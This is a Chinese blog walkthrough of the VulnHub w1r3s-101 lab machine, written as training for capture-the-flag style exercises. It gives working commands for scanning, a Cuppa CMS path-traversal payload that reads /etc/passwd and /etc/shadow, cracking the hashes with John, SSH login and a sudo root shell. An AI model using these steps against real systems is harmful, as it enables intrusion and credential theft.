freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

w1r3s-101打靶思路详解(vulnhub)
2024-03-06 15:40:10

w1r3s-101打靶思路详解(vulnhub)

第一步:信息收集--主机发现和端口扫描

使用nmap快速对局域网进行扫描来确定靶机IP

nmap -sn 192.168.31.0/24

确定靶机IP为192.168.31.105

再次使用nmap对靶机IP进行详细扫描

nmap -p- -sV -sT -O 192.168.31.105

结果如下

image

发现开放了21,22,80,3306端口

第二步:WEB渗透

访问http://192.168.31.105/

image

发现是apache的初始界面

使用dirb扫描目录

dirb http://192.168.31.105/

发现结果非常多,那就写入dirb文件中,然后使用python匹配一下

dirb http://192.168.31.105/ > dirb

image

分别访问可以发现有cuppa和wordpress这两个cms组成

wordpress 直接用wpscan扫描一下

wpscan --url http://192.168.31.105/wordpress/index.php

cuppa 用searchsploit搜索一下

searchsploit cuppa

查看

searchsploit -p  25971

image

根据结果访问https://www.exploit-db.com/exploits/25971

image

可以看到漏洞出现的位置,关键代码以及exp

使用我们直接利用访问http://192.168.31.105/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

image

那换成POST请求

image

可以了,然后读取/etc/shadow

image

然后将有hash值的用户列写入password.txt

image

第三步:后渗透

使用John进行爆破密码

john password.txt

然后查看

john password.txt --show

image

使用ssh登入

ssh w1r3s@192.168.31.105

image

然后查看权限

sudo -l

image

发现是全部权限

接下来就简单了

sudo /bin/bash

然后就读取flag了

image
至此完结,撒花。

# 网络安全技术
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录